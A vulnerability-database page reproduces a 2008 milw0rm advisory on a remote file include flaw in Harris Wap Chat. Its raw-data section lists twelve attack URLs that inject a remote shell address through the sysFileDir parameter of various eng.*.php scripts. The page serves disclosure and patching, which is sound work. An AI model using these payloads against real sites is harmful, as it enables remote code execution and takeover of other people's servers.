header-logo
Suggest Exploit
vendor:
Harris Wap Chat
by:
k1n9k0ng
9.3
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Harris Wap Chat
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Harris Wap Chat Remote File Include Vulnerability

Multiple scripts in Harris Wap Chat are vulnerable to remote file include vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted URL to the vulnerable application. This will allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Apply the patch provided by the vendor or upgrade to the latest version of the application.
Source

Exploit-DB raw data:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : Harris Wap Chat
Discovered By   : k1n9k0ng
Scripts site    : http://www.successkid.com/
Download Script : http://www.successkid.com/blogs/?p=2
Thanks To       : #sekuritionline, #semprol, #bajingan, #mimid, #yogyafree
Special To      : adhietslank, sukam, cyberlog, cah_gemblunkz, the_sims, aRiee
          letjen, k1tk4t, inouf and jayoes
Site            : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Demo Site :
http://successkid.com/wapchat/itdiv.php

Bug Found:
http://www.site.com/wapchat/src/eng.writeMsg.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.adCreate.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.adCreateSave.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.createRoom.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.forward.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.pageLogout.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.resultMember.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.saveNewRoom.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.searchMember.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.writeMsg.php?sysFileDir=[shell]

# milw0rm.com [2008-04-30]

Navigation

Suggest Exploit

Services By CQR